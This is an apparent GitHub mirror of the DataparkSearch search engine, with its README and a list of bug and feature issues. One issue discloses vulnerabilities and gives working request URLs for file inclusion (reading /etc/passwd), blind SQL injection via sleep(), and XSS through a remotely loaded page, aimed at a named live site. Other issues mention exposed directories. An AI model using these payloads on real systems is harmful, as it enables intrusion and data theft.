brianleepzx / dataparksearch Goto Github PK

Automatically exported from code.google.com/p/dataparksearch

License: GNU General Public License v2.0

Makefile 7.09% M4 1.15% Shell 5.27% Slash 1.26% C 63.66% C++ 3.97% Perl 0.72% XS 0.35% POV-Ray SDL 2.29% PHP 0.12% xBase 11.90% Scilab 0.14% HTML 1.72% Batchfile 0.36%

dataparksearch's Introduction

DataparkSearch v.4

Full featured web search engine

Documentation and auxiliary files

Documentation in English: doc/index.en.html
as a single file: doc/single.en.html
Documentation in Russian: doc/index.ru.html
as s single file doc/single.ru.html
Auxiliary files available on DataparkSearch download page in Gogle Code
You can find some packages on DataparkSearch download page on Google Drive

Discussion group

Feel free to ask any question about DataparkSearch Engine in DataparkSearch group on Google Groups

Features

Support for http, https, ftp (passive mode), nntp and news URL schemes.
htdb virtual URL scheme for SQL database indexing.
Indexes text/html, text/xml, text/plain, audio/mpeg (mp3) and image/gif mime types natively.
External parsers support for other document types, including Microsoft Word, Excel, RTF, PowerPoint, Adobe Acrobat PDF and Flash.
Can index multilingual sites using content negotiation.
Can search all of the word forms using ispell affixes and dictionaries.
Synonym, acronym and abbreviation query expansion based on editable dictionaries, specified by language and charset.
Stop-words, synonyms and acronyms lists.
Options to query with all words, all words near to each others, any words, or Boolean queries. A subset of VQL (Verity Query Language) is supported.
Popularity Rank based on a neural network model.
Results can be sorted by relevancy (using vector calculation), popularity rank as "Goo" (adding weight for incoming links), and "Neo" (neural network model), last modified time, and by "importance" (a combination of relevancy and popularity rank).
Supports wide range of character sets support with automated character set and language detection.
Offers an accent insensitive search option.
Provides phrase segmenting (tokenizing) for Chinese, Japanese, Korean and Thai.*
Includes an indexer and a web CGI front-end, as well as a search module for Apache web server (mod_dpsearch).
Handles Internationalized Domain Names (IDN).
Summary Extraction Algorithm automatically sums up each document in several sentences.
Uses If-Modified-Since for efficient transfer of only changed files.
Can tweak URLs with session IDs and other weird formats, including some JavaScript link decoding.
Can perform parallel and multi-threaded indexing for faster updating.
Flexible update scheduling, including options for checking some sections of a site more frequently.
Handles basic authentication (user name and password) and cookies.
Stores a compressed text version of the documents for extracting and viewing.
Can specify a default character set and language for a server or subdirectory, or a list of possible languages.
Noindex tags: , <NOINDEX>, , Google's special comments ,  and  consider as tags to include/exclude.
Can specify a content body tag.
Spellchecking for query words with aspell.
Flexible options and commands to customize search result pages.
Effective caching gives significant time reduction in search times.
Query logging stores the query, query parameters and the number of results found.

Disclaimer (see LICENSE for details)

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.

Additional permission under GNU GPL version 3 section 7

If you modify this program, or any covered work, by linking or combining it with the OpenSSL project's OpenSSL library (or a modified version of that library), containing parts covered by the terms of the OpenSSL or SSLeay licenses, the Free Software Foundation grants you additional permission to convey the resulting work. Corresponding Source for a non-source form of such a combination shall include the source code for the parts of OpenSSL used as well as that of the covered work.

dataparksearch's People

Contributors

Watchers

dataparksearch's Issues

Syntax Error messages in PostgreSQL log

Hi,

my postgresql log contains many error messages like
2010-06-02 23:09:48 CEST ERROR:  syntax error at or near "WHERE" at
character 86
2010-06-02 23:09:48 CEST STATEMENT:  UPDATE server SET enabled=1, tag='',
category=0, command='S', parent='0', ordre=147% WHERE rec_id='-306536636

I guess that "ordre=147%" is not correct and it should in fact be
"ordre=147", so the dps_snprintf()-statements in sql.c lines 1080 and 1090
should be changed accordingly - "ordre=%d%" probably has to be replaced by
"ordre=%d". I haven't tried that yet and don't know if maybe this behaviour
was intended, but either way postgresql doesn't like it.

Cheers,
- Daniel

Original issue reported on code.google.com by [email protected] on 2 Jun 2010 at 9:26

Skip or Robots directive is ignored for hosts, having crawl-delay in robots.txt

"Realm skip http://host.com/*" is ignored, when indexer received Crawl-delay 
directive from host.com already from robots.txt

In Also ignored:

Robots no
Realm skip http://host.com/*

or 

Robots no
Server site http://host.com/

indexer keep crawl-delay'ing...

Original issue reported on code.google.com by [email protected] on 25 Dec 2012 at 4:41

Possible PHP configuration file

What steps will reproduce the problem?
this directories may contain configuration files which contains both a username 
and a password for an SQL database. Most sites with forums run a PHP message 
base. This file gives you the keys to that forum, including FULL ADMIN access 
to the database.

Directories:

http://blog.dataparksearch.org/wp-includes/js/tinymce/plugins/spellchecker/

http://blog.dataparksearch.org/wp-includes/js/tinymce/

Original issue reported on code.google.com by [email protected] on 27 Jun 2012 at 4:55

Regex expressions in stopword file

This is more a question or feature request.

We have many words in our database (non-cached mode) that are irrelevant to
the search engine and we would like an easy mechanism to exclude them from
the index. For example, dict16 and dict32 have thousand of words, with
multiple occurrences, that begin with "$##" and then a string of numbers.
For us, words of this pattern are irrelevant and we would like to not index
them. Is there a way to use regular expressions in the stopwords file? Any
other way to achieve the same result without brute forcing the stopwords
file with every combination we find?

Thanks!

Original issue reported on code.google.com by [email protected] on 6 Nov 2009 at 9:35

Incorrect results: "(expression1) AND NOT (expression2)"

Occasionally queries of the pattern : 
"expression1 AND NOT expression2" 
give incorrect results for complex expressions.

All versions of dpsearch upto 4.53 snapshots.

Gut feeling is that the parser fails and treats AND or NOT as regular words
rather than as the boolean operators in some situation.

Original issue reported on code.google.com by [email protected] on 15 Jun 2009 at 4:55

Problems with some queries

Version: June drop of 4.53.
Using the following parameters:
/cgi-bin/search.cgi?cmd=Search!&dt=back&dp=30d&s=DRP&m=bool&fmt=long&wm=wrd&sp=1
&sy=1&wf=2221&type=&GroupBySite=no

The following query does not give the expected results:

((allinmeta.feedsource: (newsedge)) AND (allinmeta.company: (293122 OR
5071187)) AND (allinmeta.source: ("Kansas City Star" OR "New York Times")))

Where as the following which seems to be incorrect

((allinmeta.feedsource: (newsedge)) AND (allinmeta.company: (293122 OR
5071187)) AND (allinmeta.source: (Kansas City Star OR New York Times)))

The only difference is that in the first the sources have quotes around the
names. The actual articles do have "New York Times" as the source.

Original issue reported on code.google.com by [email protected] on 21 Jul 2009 at 1:50

SQL injection, XSS, Cross Site Scripting, File Include

What steps will reproduce the problem?
1.File Include

В фаиле storedoc.cgi

Чтение фаилов: /etc/passwd

в GET параметре DU чтение фаила file:///etc/passwd
/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%202012,%2006:59:51%20YEKT
&DS=48515&DU=file%3a%2f%2f%2fetc%2fpasswd&L=tr&label=&q=1&rec_id=1332401146

2.Blind SQL Injection

В фаиле search.cgi
'=sleep(2)=' URL encoded GET в параметре cmd, GroupBySite, np, s, 
site 
/kurgan/s?cmd=%25D0%259D%25D0%25B0%25D0%25B9%25D1%2582%25D0%25B8%27%3dsleep%282%
29%3d%27&GroupBySite=yes&np=0&q=1&s=DRP&syn=1

Выполняемый запрос:
INSERT INTO qinfo (q_id,name,value) VALUES 
(82971,'cmd','%D0%9D%D0%B0%D0%B9%D1%82%D0%B8'=sleep(2)='')

3. Cross Site Scripting

В фаиле storedoc.cgi

Загрузка произвольной страницы из 
интернета и возможность выполнения JavaScript 
кода

http://kurganland.ru/kurgan/cache?CS=UTF-8&CT=text/html&DM=Sat,%2017%20Mar%20201
2,%2006:59:51%20YEKT&DS=48515&DU=http://himic.ru/xss.html&L=tr&label=&q=1&rec_id
=1332401146

Выполнение:
http://kurganland.ru/kurgan/cache?DU=http://himic.ru/xss.html

Подробнее: 
http://blog.himic.ru/HiMiC/2012/07/31/dataparksearch-engine-sql-injection-xss-cr
oss-site-scripting-file-include.html

Original issue reported on code.google.com by [email protected] on 27 Aug 2012 at 9:48

Attachments:

indexer hangs on some NNTP (news) URLs

>What steps will reproduce the problem?
1. Server nntp://mynewsserver/

>What version of the product are you using? On what operating system?
DPS 4.53, built in a packet and installed into Ubuntu 10.04
The server is Eserv 2.99
DB is MySQL 5.1.41-3ubuntu12.9

Original issue reported on code.google.com by [email protected] on 1 Mar 2011 at 2:57

Attachments:

dpsearch-nangs-on-nntp_bt.txt

News (NNTP) search - too few results

Indexed found over 11 thousand messages on our news (NNTP) server. It seems 
true that they are there.

But queries return too few results.

Query of some words that must present in headers and bodies of messages, like 
authors' names (only latin! and cyrillic was not tested yet!), return 0 results.

Query of server address brought only 35 results, and 10 of them are group names 
like news://newsserver/books. Others are like news://newsserver/books/745 with 
empty $(Body), so they are not useful.


DPS 4.53, built in a packet and installed into Ubuntu 10.04
The server is Eserv 2.99

Different NNTP clients (Thunderbird, Outlook) work well with this server.

Original issue reported on code.google.com by [email protected] on 3 Mar 2011 at 7:53

runsplitter hangs after delete

What steps will reproduce the problem?
1. Create a new index (with nothing indexed in it).
2. Simulate a delete (indexer -Cwf list of urls)
3. Run the runsplitter 

What is the expected output? What do you see instead?
Runsplitter completes. Instead it hangs looking for del-split.log

What version of the product are you using? On what operating system?
subversion as of 10/23

Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 28 Oct 2008 at 5:57

ResultsLimit affects $(total) meta-variable

The value of ResultsLimit affects $(total) meta-variable.
It had better to show unlimited number of documents found in $(total).

Original issue reported on code.google.com by [email protected] on 11 Feb 2010 at 12:28

remove unreferred pages after indexing

suggestion is - remove unreferred pages after indexing, not during indexing


See 
http://www.dataparksearch.org/cgi-bin/simpleforum.cgi?fid=03&topic_id=1295977964

Original issue reported on code.google.com by [email protected] on 13 Feb 2011 at 5:06

stored_href is not always filled in since 4.52

Under certain circumstances when there are multiple indices and searchd
daemons running the stored_href is replaced.

The problem seems to be the following code around line 710
DpsVarListReplaceStr(&Doc->Sections, "Z", "Z");
The old code had, which works:
DpsVarListReplaceStr(&Doc->Sections, "Z", "");

Original issue reported on code.google.com by [email protected] on 28 May 2009 at 12:48

Compiling under Ubuntu 9.10

Hi,

I've followed all steps on the documentation, but for some reason, when I
try to compile it, it fails. Output is on the attached file.

I would really appreciate some help on this matter.

Thank you very much.

Original issue reported on code.google.com by [email protected] on 13 Dec 2009 at 1:15

Attachments:

data.txt

query with allinxx: behaves odd

Was looking for all documents where the source was not "associated press"
and had the word insurance.

The following query does not seem to work as expected:
insurance and not (allinmeta.source: "associated press")

This query seems to work but not sure it is correct as per the intent:
insurance and (allinmeta.source: not "associated press")

Original issue reported on code.google.com by [email protected] on 25 Mar 2009 at 2:28

double free or corruption backtrace

We are exploring search options for use within the Fedora Project, and in our 
tests of running the crawler (indexer), we are running into an occasional 
backtrace. It seems to be almost at random, I don't notice anything in common 
about the URL it hits before the backtrace each time.

I've attached the backtrace, and happy to provide any more information we can 
to help get this solved.

What version of the product are you using? On what operating system?

indexer from dpsearch-4.53-pqsql

[root@junk09 dpsearch]# cat /etc/redhat-release 
Red Hat Enterprise Linux Server release 6.2 (Santiago)

[root@junk09 dpsearch]# uname -a
Linux junk09.qa.fedoraproject.org 2.6.32-220.4.1.el6.x86_64 #1 SMP Thu Jan 19 
14:50:54 EST 2012 x86_64 x86_64 x86_64 GNU/Linux



Please provide any additional information below.

Again, if there's anything we can do, we're happy to work with you try to and 
get this fixed. :)

Original issue reported on code.google.com by [email protected] on 13 Feb 2012 at 7:38

Attachments:

Multi-dbaddr is broken in 4.52 onwards

Setup dpsearch with multiple indices each with its own searchd daemon.
Setup the search.htm to search across all the searchd daemons
If there are duplicate articles between the indices you will sometimes get
results with no document information depending on the order of the searchd
daemons specified in the search.htm. 

The problem lies around line 348 in the file src/searchd.c #ifdef 
DpsDocFromTextBuf(&Res->Doc[ndocs], tok);
WITH_MULTIDBADDR
                                        {
                                          char *dbstr =
DpsVarListFindStr(&Res->Doc[ndocs].Sections, "dbnum", NULL);
                                          if (dbstr != NULL) {
                                            Res->Doc[ndocs].dbnum =
DPS_ATOI(dbstr);
                                          }
                                        }
#endif

Assigning Res->Doc[ndocs].dbnum causes the db number to be set incorrectly
and the document is looked for in the wrong index. Previous versions did
not have that code and also the assignment
DpsDocFromTextBuf(&Res->Doc[ndocs], tok); was after the #endif.

Commenting out the whole if(dbstr) ... clause and moving the assignment to
the old position seems to fix the problems.

Original issue reported on code.google.com by [email protected] on 14 May 2009 at 5:18

Sub-string searches

Hi Maxime,

We are using the latest snapshot 4.53 from 2010_01_19 (with stop word regex
expressions, thanks!) on Red Hat 5.4 64-bit with MySQL 5.1.42.

Our MySQL database if roughly 4 millions URLs with 20GB of data and
indexes. We originally started using cache mode, but our users weren't
pleased the results. The root of the issue was no ability to perform
sub-string searches which wasn't supported by cache mode. So we switched
over to MySQL multi-mode without CRCs so that it supports sub-string searches. 

Our indexing speed greatly improved with MySQL, but the search performance
has suffered. We sacrificed speed for relevancy, in our opinion. We are
actually quite disappointed with MySQL and it's inability to support query
parallelization. Our server has multiple cores and lots of memory so we
have loaded all the tables and indexes directly into memory, about 20GBs
worth. We've noticed that individual queries to a single dictionary table
with 75 million rows returns rather quickly, around 3 seconds. This
performance is ok, but we see a chance to improve sub-string searches and
improve performance. Every query that dpsearch issues uses a like statement
and needs to scan the entire index. We realize this is the price we pay to
support sub-string searching. The issue we see is that dpsearch issues a
query to the dict(x) table then waits for the result and issues the next
query to the next dict(x+1) table and waits for the results then dict(x+2)
and so on up to dict32 then combines the results. Does dpsearch have the
ability to issues multiple queries at once, possibly a configurable amount
of queries. This feature would get around MySQL's inability to support
query parallelization and chew up some wasted resources on our server. Any
thoughts or other suggestions to get good performance with sub-string searches.

Thanks for all your hard work.

Original issue reported on code.google.com by [email protected] on 27 Jan 2010 at 7:10

Supress Links During Searches

Hello Maxime,

We are using the latest 4.54 snapshot.

We have a URL (call it indexList.html). indexList.html has links to 16
other URLs, call them indexList0.html, indexList1.html thru indexListF.html
for a total of 16 links. These 16 pages contain about 2,000 links per page
and provide a means to access files that are stored in a database file
vault. Without these generated pages, the indexer can't find the files in
the vault. We want the indexer to find and index all files contained on the
16 html pages labeled 0 thru F, but to not serve up the URLs
indexList0.html thru indexListF.html themselves during searches.

Since each page 0-F has thousands of links, the search results tend to find
and rank the indexList0.html type pages higher than the contents and files
found on these pages. 

We've tried various combinations of HrefOnly and can't seem to get the
desired functionality. It appears you can control if the contents of a page
are indexed, but not if a link is indexed. It seems if a link is "allowed"
then it is indexed. We want to "allow" a link, but not index the link. 







We want to scan the links and contents of page
We want to scan all the files and URLs on the page with all
2.
3.

What is the expected output? What do you see instead?

Original issue reported on code.google.com by [email protected] on 11 May 2010 at 3:12

Segmentation fault во время индексирования

What steps will reproduce the problem?
1. Индексирование документов (/sbin/indexer -am -g 04)
2.
3.

What is the expected output? What do you see instead?

Выпадает в Segmentation fault

What version of the product are you using? On what operating system?

v1.50 (снапшот от 5-го июля 2008)

Please provide any additional information below.


Выпадает только на некоторых документах.  
Причем только как-то на таблице,
в которую скриптом слиты тела PDF-ных 
документов, а в качестве индексов
используются имена файлов.  Может там 
встречаются некорректные символы? Или
текстовые идексы плохо перевариваются?

Таблицу из 3000 тысяч документов, которые 
просто вручную были загнаны туда
с помощью редакторов текста на сайте, 
индексирует без проблем.

Original issue reported on code.google.com by [email protected] on 9 Jul 2008 at 1:22

Attachments:

backtrace.txt

Enhancement: Search document and limit by metatags

Many web documents have tags that look like:
<meta name="topic" content="insurance automobiles"/> 
<meta name="location" content="USA UK Germany"/>
or other relevant information.

Currently dpsearch allows searches to be limited by time frames (e.g. limit
search only to the last week). 

It will be good to be able to limit searches by metatags so that for a
content with metatags like the example ones earlier we could limit searches
to only metatags=topic,content=automobiles or
metatag=topic,content=automobiles,metatag=location,content=USA

Not sure how the syntax should be given that we would probably want to
limit the searches by multiple different metatags and different values for
them. Simplistically the syntax could look like:
q="somedata"&metatag="topic:automobiles,insurance"&metatag="location:USA,UK" 

etc.

Original issue reported on code.google.com by [email protected] on 29 Jul 2008 at 11:28

XML tags equal to dpsearch meta-variable cause the problem

If a XML document has the following code:
<category><![CDATA[дании]]></category>

then this is appended to the dpsearch's category assigned to the document.

Original issue reported on code.google.com by [email protected] on 11 Feb 2010 at 12:35

Enhancement: User defined plugins.

DPsearch has the ability to search across a very large set of documents (we
have tested with over 20M). We can search the entire document space or
parts of the document based on the concept of sections and limits (like
meta-tags, last-modified-date ...). However, like most search engines the
searches are restricted to information that has been indexed. Thus if we
have some new information about a document or existing information that was
not used to create special section or limit indexes then it becomes
difficult without re-indexing the collection.Additionally the additional
restrictions are best dealt with by other programs that could apply logic
that is not necessary "search" type. A couple of examples would be:

Lets assume that the documents indexed have some information about say the
geography associated with the document. However, when the collection was
originally indexed the geography was not considered important and no
geography section was created. It would be nice to be able to search the
document collection for the search criteria and then filter the results by
some geography restriction. Obviously the simples solution would be to add
in a definition of a geography section, and re-index the collection.
However with very large collections this is very expensive both in terms of
time and disk space. In addition we could end up with literally dozens if
not hundreds of sections.

Another situation would be where the documents found need to be restricted
on some criteria no related to a search (e.g. only show the documents
"permitted" to the user making the query). Again in theory we could do some
combinations of ownership and other restrictions indexed in - the
information is pretty dynamic and we will need to re-index all the time.

The solution proposed is to have the notion of "filter plugins" added to
dpsearch. The dpsearch engine gathers all the search results into an array
and then after removing duplicates, clones etc. retrieves the document
information for a pageful. In this case imagine a small user provided
function that is called after the result list build and cleaned but before
the document information retrieval step. The filter could then get a list
of record ids for the documents and then return a modified list that may
have some records removed (or added?) based on external criteria. This will
allow fine grained local control over the results. If such a mechanism were
available then we could solve the situations above by doing the following

Build a new database table (in the same database as used by dpsearch or a
separate one) that has a table tracking the record id and columns for other
meta-data. The plugin would then check filter the results using the
database information. Clearly it will be slower than a the index natively 
but for infrequently used but large or a new metadata that will be indexed
but as a transitional mechanism this would work quite well.

Similarly for the second example the plugin would call an external
permissions program that could resolve the permission based on other
criteria which have nothing to do with the search engine.

Finally we could add in records into the result set if deemed necessary
(though I suspect that this is better done outside the search engine when
creating a results page).

The changes that I see would be

Ability to build a plugin - best would be the ability to have a shared
library that can be setup in the config file. If defined and present then
the search engine would use it and if not it would not. The plugin API
should be very simple (at least for starters):
- Call to initialize the plugin
- call to re-initialize the plugin (when the search engine gets a HUP signal).
- Call to terminate the plugin
- Call to process a result list (I suspect only an array of proposed
results, a command line and returning the array of results).
- We could add additional APIs available to the plugin to access dpsearch
functions for ease of writing the plugin - e.g. functions to print messages
into the log ...

Changes to dpsearch 
- Addtitional paramters to pass information to the plugin. E.g.
&pluginparms="parm1, parm2, parm3"
- Configuration file changes to define the plugin
- Code changes to call the plugin.

Questions:
- What happens if there are multiple plugins?  Particularly passing
commandline parameters over.
- Where is the plugin called - when the results are obtained in cache.c or
sql.c or when they are assembled in search.c? Each has a plus/minus in
terms of having access to information (e.g. if there are multiple indexes
calling the plugin from cache.c or sql.c will mean that the plugin can get
the correct database information and be able to use that as opposed to in
search.c where the search may be running on a machine with no access to the
actual database).
- What languages should be allowed? Clearly the application is in C so C or
C++ is natural - however it is also easier to write plugins in some
scripting language.

Original issue reported on code.google.com by [email protected] on 18 Aug 2008 at 1:09

Incorrect results and segfault while searching using trunk version.

What steps will reproduce the problem?
1. Create an index with a June snapshot
2. Search the index with the current trunk branch.
3. No results for "c b" and segfault for "a j g"

What is the expected output? What do you see instead?
For the first search expected 267 results (June snapshot gave that number)
and definitely not a segfault.

What version of the product are you using? On what operating system?
Noted above. On linux with a clustered setup (indexer and search engines
seperated).

Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 13 Jul 2008 at 1:14

indexer -Ecreate

Im trying to setup dataparksearch, but im having trubble running "indexer 
-Ecreate"

Output:

Sphinx 2.0.4-release (r3135)
Copyright (c) 2001-2012, Andrew Aksyonoff
Copyright (c) 2008-2012, Sphinx Technologies Inc (http://sphinxsearch.com)

ERROR: malformed or unknown option near '-Ecreate'.

Original issue reported on code.google.com by janbjorge on 18 May 2013 at 2:38

Подсветка поисковых запросов в результатах поиска по HTDB

IMHO небходима подсветка вхождений 
поискового запроса в результатах поиска
при испозовании схемы HTDB. То есть нужно 
реализовать хранение документов,
проиндексированных через HTDB, в базе stored.

Original issue reported on code.google.com by [email protected] on 27 May 2009 at 12:32

(allindp_id: nnn) does not work

Tried against the latest snapshot. It does not work with or without the
section definition. Definition used was:
Section DP_ID 3 64
also tried
Section dp_id 3 64

Original issue reported on code.google.com by [email protected] on 28 May 2009 at 2:36

Enhancement: Use document from web instead of stored

Currently the only way to get highlights in results is to use stored.
However when the documents being indexed are from a local file system or
web server then it does not make sense to have a complete additional copy
of the site just for highlighting. 

It will be good to have an enhancement to the stored feature (I guess
stored.cgi - though not sure how this would work if we are using
mod_dpsearch in apache) to indicate that the document to be returned with
the query terms highlighted should be fetched using the original url rather
than a local copy.

Original issue reported on code.google.com by [email protected] on 29 Jul 2008 at 11:20

Date handling is not robust enough

If the incoming file has a "Last-Modified" tag that looks like 
<meta http-equiv="Last-Modified" content="Thu, 15 Jan 2009 18:40:46 EST"/> 
the timezone seems to be ignored and instead the time converted to GMT.
Also the parser is quite strict about the format and slight variations seem
to throw it off.

There are a bunch of different date parsers that are more flexible that are
available both in the GNU glibc and under other GNU like licenses. Probably
should use one of those? CURL seems to have good one
https://www.koders.com/c/fidFDF8CF1254129577CE4A24545AF8DF31CA6E2E1A.aspx?s=md5

Original issue reported on code.google.com by [email protected] on 16 Jan 2009 at 1:35

SearchD gives internal server error

Trying to get searchd to run we have performed the following.
1. searchd.conf is configured with defaults from dist file
2. In search.htm we have the following two dbaddr lines.
   a. DBaddr
mysql://user:pass@localhost/dpesarch/?socket=/var/lib/mysql/mysql.sock&dbmode=mu
lti&trackquery&stored=localhost
   b. DBaddr searchd://localhost/

All processes, including searchd, are running on the same machine. 

When we navigate to to the search homepage it is displayed, but when a
search is performed we receive an Internal Server Error (500).

We are using v4.51 (can't successfully run .52 or 53)

Any ideas or additional configuration necessary?

Original issue reported on code.google.com by [email protected] on 1 Oct 2009 at 5:57

Invalid FSF Address

As I said in Issue #39, I'm looking at packaging this for use within Fedora 
Infrastructure.

In my review request (https://bugzilla.redhat.com/show_bug.cgi?id=794542) it 
was pointed out that dpsearch's include files contain outdated FSF address 
information. Should be a fairly simple fix that would make a lot of rpmlint 
errors go away, if you're willing to. :-).

Thoughts?

Original issue reported on code.google.com by [email protected] on 18 Feb 2012 at 2:47

MS SQL Server Compatability/Issues

In our quest to use a database to have full sub-string searching
capability, we have compared the performance of postgres, mysql and MS SQL
Server 2005. Without a doubt, sql server is the fastest for full index
scans on tables with 100+ million rows.

So we are trying to get dpsearch to work with SQL Server 2005. We are using
multi-mode via unixODBC and FreeTDS (latest versions for both). 

1. The scripts to create the db tables are out of date. Several tables
(robots and cookies) are missing and the some fields are missing like
charset_id from url. There are a few other issues. These issue were easily
resolved, but can they be fixed in the distribution? If you would like, I
could provide the updated files? 

2. When performing initial setup with the -Ecreate command, it works fine.
The srvinfo table appears to be populated correctly. During indexing no
documents are indexed, but no errors. Also, a simple commands like
"./indexer -S" returns an error. 

When running ./indexer -S with the debug_sql #define turned on in
sqldbms.c, the error message is:
{sqldbms.c2621} Query: COMMIT
    SQL-server message: [unixODBC][FreeTDS][SQL Server]The COMMIT
TRANSACTION request has no corresponding BEGIN TRANSACTION. Then the same
line repeats

The resulting output/statistics from the -S command is empty, just the
headers and predefined content.

I have used SQL Server profiler and captured the commands sent to the
server by dpsearch, they are as follows:
1) SET IMPLICIT_TRANSACTIONS ON
2) IF @@TRANCOUNT > 0 COMMIT
3) Select status, sum(case when next_index_time <= 1266421936 then 1 else 0
end), count(*), sum(docsize), sum(case when next_index_time <= 1266421936
then docsize else 0 end) from url Group By status order by status
4) If @@TRANCOUNT > 0 COMMIT
5) COMMIT
6) IF @@TRANCOUNT > 0 COMMIT

I've run these commands (as a batch) directly on SQL Server and they return
with the same error message. If I remove the standalone commit in line 5 it
works. 

I have also successfully run the same set of commands via tsql, w/out the
extra commit, (comes with FreeTDS) and the data is returned successfully.

If I comment out the COMMIT being sent by dpsearch near line 2621 of
sqldbms.c then I don't receive the SQL Server error message, but the status
results are still zero and indexing is still not performed.

It appears that select statements are not functioning properly, but inserts
are working.

Are there special options to compile unixODBC and FreeTDS for use with
dpsearch relating to auto-commit of transactions? Any other thoughts?

Our version is dpsearch-4.53-19012010 compiled with multi-mode and unixODBC
support.


Thanks in advance.

Original issue reported on code.google.com by [email protected] on 17 Feb 2010 at 4:30

free() pointer error in 4.53 12092009

1. run indexer with -C option, answer "YES" then the database is cleared
and following error is received.

Deleting...Done
*** glibc detected *** ./indexer: free(): invalid pointer: 0x097e95b0 ***
======= Backtrace: =======
/lib/libc.so.6[0x38fb16]
/lib/libc.so.6(CFREE+0x90)[0x393030]
/usr/local/dpsearch/lib/libdpsearch-4.so(DpsDBFree+0x30)[0x916a90]
/usr/local/dpsearch/lib/libdpsearch-4.so(DpsDBListFree+0x35)[0x916bf5]
/usr/local/dpsearch/lib/libdpsearch-4.so(DpsEnvFree+0x46)[0x905896]
./indexer[0x804b530]
/lib/libc.so.6(__libc_start_main+0xdc)[0x33cdec]
./indexer[0x8049d91]

This error occurs on RHEL5 32-bit.

The same error occurs for many other commands.

Original issue reported on code.google.com by [email protected] on 22 Sep 2009 at 8:21

Indexer does not correctly handles absolute href without protocol type specification


1. Let's start indexing from http://www.yandex.ru/
2. Indexer tries to fetch http://www.yandex.ru/yandex.st/.... But urls in 
source looks like <a href="//yandex.st/**"

It should replace //yandex.st/*** to http://yandex.sy/*** where http is the 
current URL's protocol.

Original issue reported on code.google.com by [email protected] on 6 Apr 2011 at 10:52

storedoc.cgi does not honor &tmplt parameter

What steps will reproduce the problem?
1.Setup dpsearch to use storedoc
2. Try to use a different storedoc template by passing in the parameter
&tmplt=storedoc-2.htm


What is the expected output? What do you see instead?
It should use the new template. It uses the template called storedoc.htm.
If that is not there you get an error about the template not found.

What version of the product are you using? On what operating system?
4.51 latest snapshot.

Please provide any additional information below.

Original issue reported on code.google.com by [email protected] on 19 Aug 2008 at 2:01

Licensing: OpenSSL

I'm trying to package DataparkSearch for use within Fedora Infrastructure 
(review request is here: https://bugzilla.redhat.com/show_bug.cgi?id=794542 )

It was brought to my attention that dpsearch links against openssl, but does 
not provide an exception in the license for it. I was asked to inquire if you 
would possibly add an exception to dpsearch's license for this (see 
http://en.wikipedia.org/wiki/OpenSSL#Licensing ), or if not, maybe add the 
ability to use gnutls, but that would likely be more work.

Is this something you'd be willing to discuss?

Thanks!

Original issue reported on code.google.com by [email protected] on 18 Feb 2012 at 2:44

Bad URL in BUGS file

http://www.dataparksearch.org/cgi-bin/bt.pl is buggy itself

Original issue reported on code.google.com by [email protected] on 1 Mar 2011 at 3:08

Query performance improvements

The query caching mechanism works well for queries. However if users issue
a lot pattern queries e.g. expression1 and expression2 where each of the
expressions are complex queries in their own right.

It will be nice if the query cache were to cache selected subqueries. This
way if users reuse expression2 from the above example in a dozen other
queries they will benefit from the query cache.

Original issue reported on code.google.com by [email protected] on 15 Jun 2009 at 5:31

Files may be uploaded through FTP containing juicy info are being displayed

What steps will reproduce the problem?

Go to http://blog.dataparksearch.org/wp-includes/images/ Then see there you can 
find files and the directory like ftp, It is directory of wp-includes of 
wordpress.

What is the expected output? What do you see instead?

Files uploaded through ftp by other people, sometimes you can find all sorts of 
things like important stuff. 

What version of the product are you using? On what operating system?

Windows-7

Please provide any additional information below.

Please update me about this issue

Thank you.

Original issue reported on code.google.com by [email protected] on 27 Jun 2012 at 4:33

Query caches

We have multiple search engines deployed for a single index to handle the
load. A query cache is created for the query when it hits a search engine.
However, if "next" page query hits the second engine it does not benefit
from the cache and takes just as long as the original query. It will be
good if the query caches could be put on an NFS drive and shared so that
once a query has run on one search engine the cached result is available
for all.

Probably needs some simple locks while creating and reading the cache file.
Alternately - probably even more elegant would be to use memcached to cache
the results.

Original issue reported on code.google.com by [email protected] on 15 Jun 2009 at 5:02

Please see this

Dear Sir,

See this link

https://www.whitefirdesign.com/about/dataparksearch-security-bug-bounty-program.
html

Here is bounty mentioned for your website.

But Even when i found vulnerabilities in your website, You patched them and 
also deleted the thread. but I have all the history of thread in my email

So can you please tell about my Datapark Search Bounty for issues 41 & 
42(Issues now deleted unfortunately)

Original issue reported on code.google.com by [email protected] on 29 Jun 2012 at 4:33

Query Tracker does not capture all query parameters

The query tracker only captures the actual search string. However in order
to make a meaningful analysis it needs to capture the other parameters too
eg. if the date ranges, word formats ...

Original issue reported on code.google.com by [email protected] on 9 Jul 2009 at 7:48

dbmode=cache is not documented

Initially I configured indexer with
 mysql://foo:bar@localhost/search/?dbmode=cache
changed only username and password.

Indexer indexed without any error, and then search.cgi always returned 0 
results.

Later, I re-read docs and noticed that must set dbmode to something else.

So dbmode=cache either must cause an error or be documented.

Original issue reported on code.google.com by [email protected] on 1 Mar 2011 at 3:16

numeric range search

A request from blog.dataparksearch.org/148:

Can you also include numeric range search?

Original issue reported on code.google.com by [email protected] on 24 Apr 2009 at 10:45

Unrecognized options: --enable-htdb

What steps will reproduce the problem?
1. try to install using ./configure or ./install.pl
2. if using ./install.pl, enable htdb option
3. continue accepting defaults

Need to be able to index a database as we export URLs to a database for
faster indexing and searching but the latest version will not compile with
htdb support

Original issue reported on code.google.com by [email protected] on 14 Jan 2010 at 7:55

RemoteCharset does not work properly with FTP sites

LocalCharset UTF-8
RemoteCharset UTF-8
Server ftp://utf8server/
Русские буквы — OK

LocalCharset UTF-8
RemoteCharset windows-1251
Server ftp://winserver/
??????? ????? — fail

but

$ curl ftp://winserver/ | iconv -f cp1251 -t UTF-8
Русские буквы — OK


DPS 4.53, built in a packet and installed into Ubuntu 10.04

Original issue reported on code.google.com by [email protected] on 2 Mar 2011 at 9:30

brianleepzx / dataparksearch Goto Github PK

dataparksearch's Introduction

DataparkSearch v.4

